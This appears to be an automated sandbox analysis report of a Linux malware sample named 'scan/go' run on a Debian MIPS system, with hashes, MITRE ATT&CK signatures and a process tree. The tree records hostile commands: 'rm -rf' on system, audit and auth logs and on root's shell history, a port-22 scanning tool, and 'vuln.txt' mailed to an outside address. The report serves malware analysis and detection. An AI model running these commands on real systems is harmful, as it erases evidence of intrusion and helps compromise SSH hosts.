8ff25cb03dc615fe8595b1acdc4c3e868a1a31a615801842d1417e84e73b2d71

Analysis

max time kernel
35s
max time network
26s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22/12/2023, 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scan/go
Size

794B
MD5

fd52040029cde6318569f91abc1090fc
SHA1

65117e69cfc77df7db1d0695eb66903093e2e397
SHA256

150ad9bc0078b993db48ed0d373723df82c89e23c3d1dcfb795aac3f5853a5cc
SHA512

5f707d39c2494cf7bc41acc3a5402d1442ab12c4cc2c73c9f15dedac7e9d37d25a01119a02887e442bdeaacc3f3290b6dd33f1c5cdbbca011df140c11ce129f7

Score

7^/10

evasion

Malware Config

Signatures

Deletes Audit logs 1 TTPs 1 IoCs

Deletes logs related to the Linux Audit framework.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/audit/audit.log	rm

Deletes system logs 1 TTPs 4 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/messages	rm
File deleted	/var/log/syslog	rm
File deleted	/var/log/messages	rm
File deleted	/var/log/syslog	rm

Deletes log files 1 TTPs 48 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/mail.warn	rm
File deleted	/var/log/apt/eipp.log.xz	rm
File deleted	/var/log/btmp	rm
File deleted	/var/log/debug	rm
File deleted	/var/log/lastlog	rm
File deleted	/var/log/apt	rm
File deleted	/var/log/btmp	rm
File deleted	/var/log/mail.err	rm
File deleted	/var/log/apt	rm
File deleted	/var/log/exim4/mainlog	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/installer/hardware-summary	rm
File deleted	/var/log/installer/cdebconf	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/audit	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/mail.info	rm
File deleted	/var/log/mail.log	rm
File deleted	/var/log/installer/syslog	rm
File deleted	/var/log/installer/cdebconf/templates.dat	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/debug	rm
File deleted	/var/log/exim4	rm
File deleted	/var/log/user.log	rm
File deleted	/var/log/daemon.log	rm
File deleted	/var/log/installer/cdebconf/questions.dat	rm
File deleted	/var/log/user.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/installer	rm
File deleted	/var/log/lastlog	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/exim4	rm
File deleted	/var/log/installer	rm
File deleted	/var/log/audit	rm
File deleted	/var/log/daemon.log	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/installer/partman	rm
File deleted	/var/log/installer/lsb-release	rm
File deleted	/var/log/installer/status	rm

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	ls
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	ls

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mutUI3jr	mail
File opened for modification	/tmp/scan/cleanlist	go
File opened for modification	/tmp/scan/mfu.txt	Process not Found
File opened for modification	/tmp/muofe8av	mail

/tmp/scan/go
/tmp/scan/go
1⤵
- Writes file to tmp directory
PID:705
- /bin/ls
  ls /var/log/
  2⤵
  - Reads runtime system information
  PID:714
- /bin/rm
  rm -rf /var/log/alternatives.log
  2⤵
  - Deletes log files
  PID:716
- /usr/bin/touch
  touch /var/log/alternatives.log
  2⤵
  PID:717
- /bin/rm
  rm -rf /var/log/apt
  2⤵
  - Deletes log files
  PID:718
- /usr/bin/touch
  touch /var/log/apt
  2⤵
  PID:724
- /bin/rm
  rm -rf /var/log/audit
  2⤵
  - Deletes Audit logs
  - Deletes log files
  PID:725
- /usr/bin/touch
  touch /var/log/audit
  2⤵
  PID:726
- /bin/rm
  rm -rf /var/log/auth.log
  2⤵
  - Deletes log files
  PID:727
- /usr/bin/touch
  touch /var/log/auth.log
  2⤵
  PID:728
- /bin/rm
  rm -rf /var/log/btmp
  2⤵
  - Deletes log files
  PID:730
- /usr/bin/touch
  touch /var/log/btmp
  2⤵
  PID:731
- /bin/rm
  rm -rf /var/log/daemon.log
  2⤵
  - Deletes log files
  PID:732
- /usr/bin/touch
  touch /var/log/daemon.log
  2⤵
  PID:733
- /bin/rm
  rm -rf /var/log/debug
  2⤵
  - Deletes log files
  PID:734
- /usr/bin/touch
  touch /var/log/debug
  2⤵
  PID:735
- /bin/rm
  rm -rf /var/log/dpkg.log
  2⤵
  - Deletes log files
  PID:736
- /usr/bin/touch
  touch /var/log/dpkg.log
  2⤵
  PID:738
- /bin/rm
  rm -rf /var/log/exim4
  2⤵
  - Deletes log files
  PID:739
- /usr/bin/touch
  touch /var/log/exim4
  2⤵
  PID:740
- /bin/rm
  rm -rf /var/log/faillog
  2⤵
  - Deletes log files
  PID:741
- /usr/bin/touch
  touch /var/log/faillog
  2⤵
  PID:742
- /bin/rm
  rm -rf /var/log/fontconfig.log
  2⤵
  - Deletes log files
  PID:743
- /usr/bin/touch
  touch /var/log/fontconfig.log
  2⤵
  PID:744
- /bin/rm
  rm -rf /var/log/installer
  2⤵
  - Deletes log files
  PID:745
- /usr/bin/touch
  touch /var/log/installer
  2⤵
  PID:746
- /bin/rm
  rm -rf /var/log/kern.log
  2⤵
  - Deletes log files
  PID:747
- /usr/bin/touch
  touch /var/log/kern.log
  2⤵
  PID:748
- /bin/rm
  rm -rf /var/log/lastlog
  2⤵
  - Deletes log files
  PID:749
- /usr/bin/touch
  touch /var/log/lastlog
  2⤵
  PID:750
- /bin/rm
  rm -rf /var/log/messages
  2⤵
  - Deletes system logs
  PID:751
- /usr/bin/touch
  touch /var/log/messages
  2⤵
  PID:752
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:753
- /usr/bin/touch
  touch /var/log/syslog
  2⤵
  PID:754
- /bin/rm
  rm -rf /var/log/user.log
  2⤵
  - Deletes log files
  PID:755
- /usr/bin/touch
  touch /var/log/user.log
  2⤵
  PID:756
- /bin/rm
  rm -rf /var/log/wtmp
  2⤵
  - Deletes log files
  PID:757
- /usr/bin/touch
  touch /var/log/wtmp
  2⤵
  PID:758
- /bin/sleep
  sleep 2
  2⤵
  PID:759
- /bin/cat
  cat motd
  2⤵
  PID:760
- /tmp/scan/class
  ./class 22 -a -i eth0 -s 10
  2⤵
  PID:761
- /bin/cat
  cat bios.txt
  2⤵
  PID:762
- /usr/bin/sort
  sort
  2⤵
  PID:763
- /usr/bin/uniq
  uniq
  2⤵
  PID:764
- /bin/grep
  grep -c . mfu.txt
  2⤵
  PID:765
- /tmp/scan/update
  ./update 1500
  2⤵
  PID:766
- /bin/cat
  cat vuln.txt
  2⤵
  PID:767
- /usr/bin/mail
  mail -s gugolete "[email protected]"
  2⤵
  - Writes file to tmp directory
  PID:768
- - /usr/sbin/sendmail
    /usr/sbin/sendmail -oi -f "root@debian9-mipsbe-20231215-en-6" -t
    3⤵
    - Reads runtime system information
    PID:771
- /bin/rm
  rm -rf /root/.bash_history
  2⤵
  PID:815
- /usr/bin/touch
  touch /root/.bash_history
  2⤵
  PID:816
- /bin/ls
  ls /var/log/
  2⤵
  - Reads runtime system information
  PID:817
- /bin/rm
  rm -rf /var/log/alternatives.log
  2⤵
  - Deletes log files
  PID:818
- /usr/bin/touch
  touch /var/log/alternatives.log
  2⤵
  PID:819
- /bin/rm
  rm -rf /var/log/apt
  2⤵
  - Deletes log files
  PID:820
- /usr/bin/touch
  touch /var/log/apt
  2⤵
  PID:821
- /bin/rm
  rm -rf /var/log/audit
  2⤵
  - Deletes log files
  PID:822
- /usr/bin/touch
  touch /var/log/audit
  2⤵
  PID:823
- /bin/rm
  rm -rf /var/log/auth.log
  2⤵
  - Deletes log files
  PID:824
- /usr/bin/touch
  touch /var/log/auth.log
  2⤵
  PID:825
- /bin/rm
  rm -rf /var/log/btmp
  2⤵
  - Deletes log files
  PID:826
- /usr/bin/touch
  touch /var/log/btmp
  2⤵
  PID:827
- /bin/rm
  rm -rf /var/log/daemon.log
  2⤵
  - Deletes log files
  PID:828
- /usr/bin/touch
  touch /var/log/daemon.log
  2⤵
  PID:829
- /bin/rm
  rm -rf /var/log/debug
  2⤵
  - Deletes log files
  PID:830
- /usr/bin/touch
  touch /var/log/debug
  2⤵
  PID:831
- /bin/rm
  rm -rf /var/log/dpkg.log
  2⤵
  - Deletes log files
  PID:832
- /usr/bin/touch
  touch /var/log/dpkg.log
  2⤵
  PID:833
- /bin/rm
  rm -rf /var/log/exim4
  2⤵
  - Deletes log files
  PID:834
- /usr/bin/touch
  touch /var/log/exim4
  2⤵
  PID:835
- /bin/rm
  rm -rf /var/log/faillog
  2⤵
  - Deletes log files
  PID:836
- /usr/bin/touch
  touch /var/log/faillog
  2⤵
  PID:837
- /bin/rm
  rm -rf /var/log/fontconfig.log
  2⤵
  - Deletes log files
  PID:838
- /usr/bin/touch
  touch /var/log/fontconfig.log
  2⤵
  PID:839
- /bin/rm
  rm -rf /var/log/installer
  2⤵
  - Deletes log files
  PID:840
- /usr/bin/touch
  touch /var/log/installer
  2⤵
  PID:841
- /bin/rm
  rm -rf /var/log/kern.log
  2⤵
  - Deletes log files
  PID:842
- /usr/bin/touch
  touch /var/log/kern.log
  2⤵
  PID:843
- /bin/rm
  rm -rf /var/log/lastlog
  2⤵
  - Deletes log files
  PID:844
- /usr/bin/touch
  touch /var/log/lastlog
  2⤵
  PID:845
- /bin/rm
  rm -rf /var/log/mail.err
  2⤵
  - Deletes log files
  PID:846
- /usr/bin/touch
  touch /var/log/mail.err
  2⤵
  PID:847
- /bin/rm
  rm -rf /var/log/mail.info
  2⤵
  - Deletes log files
  PID:848
- /usr/bin/touch
  touch /var/log/mail.info
  2⤵
  PID:849
- /bin/rm
  rm -rf /var/log/mail.log
  2⤵
  - Deletes log files
  PID:850
- /usr/bin/touch
  touch /var/log/mail.log
  2⤵
  PID:851
- /bin/rm
  rm -rf /var/log/mail.warn
  2⤵
  - Deletes log files
  PID:852
- /usr/bin/touch
  touch /var/log/mail.warn
  2⤵
  PID:853
- /bin/rm
  rm -rf /var/log/messages
  2⤵
  - Deletes system logs
  PID:854
- /usr/bin/touch
  touch /var/log/messages
  2⤵
  PID:855
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:856
- /usr/bin/touch
  touch /var/log/syslog
  2⤵
  PID:857
- /bin/rm
  rm -rf /var/log/user.log
  2⤵
  - Deletes log files
  PID:858
- /usr/bin/touch
  touch /var/log/user.log
  2⤵
  PID:862
- /bin/rm
  rm -rf /var/log/wtmp
  2⤵
  - Deletes log files
  PID:863
- /usr/bin/touch
  touch /var/log/wtmp
  2⤵
  PID:864
- /bin/sleep
  sleep 5
  2⤵
  PID:865
- /tmp/scan/clean
  ./clean
  2⤵
  PID:896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/dead.letter

Filesize
153B

MD5
1c99b03857edf11c9c283ce11bf39e0e

SHA1
cc888d32fae0f4f6f50a8ebbed92e792c7f8f593

SHA256
81fe84eed1b60139eb20318659e30e0480a6ca88d275e8cdbee037fa547a7772

SHA512
b48ba94ac1d7c3fa1c4d7802d031da0fde56002dbc9d49df23b0072bed09136cf32f081684bfaf8a3f66d6aa5e5a27d3bf9bd81a07a600eaeac33c84855eebb8

Download Submit
/var/spool/exim4/input/1rH0PN-0000CR-Uv-D

Filesize
19B

MD5
d6938778451895f91be20957ff73258e

SHA1
9958a71e70dcb489a905c438ace1bdf3750f9449

SHA256
655ec4dcf1df3a6c840dcf9a43090835627b16bc470587b0753c1bb611619f35

SHA512
9e81435fd13c434d096579af54918cda437212cd9bf999b05cbfb012f25ed920bdaf3f5964af59252e0aa186e6bfbf3e5cbf9dc30c69d0be029a27e2b1dd1fae

Download Submit
/var/spool/exim4/input/hdr.771

Filesize
740B

MD5
eeceac1f6a391dd9b7710f7c4732bbd9

SHA1
4dfd28d8c0edca552609651cb7ee1edefb4d4561

SHA256
8a88f2c7bc19d2381b07e7b87091fe4d76c167e2cffd3cb6cf24dc4848c2e582

SHA512
3d6f9abeaab539244795ffd83ac2caad93575e5e9938fd9021f6b3b6e92df11e3bd20c62531ea1b8ce3a8c50d3f9635726cab483cede094ee47e079e9a8d6027

Download Submit
/var/spool/exim4/msglog/1rH0PN-0000CR-Uv

Filesize
89B

MD5
d86929d3f68c762dce0f8f32aa54bac1

SHA1
db7a6cc6b7c848dde376572a684df6dc7eb01042

SHA256
dd013f401b6ad83eb9fb2e7b9c003144821af2d56d438b06bd445fbc973e0000

SHA512
72576f49fb48fec2407a65ae83fb338e5c8d106ac703bae35c3d9008f6dc12f9e426f24c60151138d30ede8b4826b4989094b6a1ef3c9b67858e83798990cf89

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads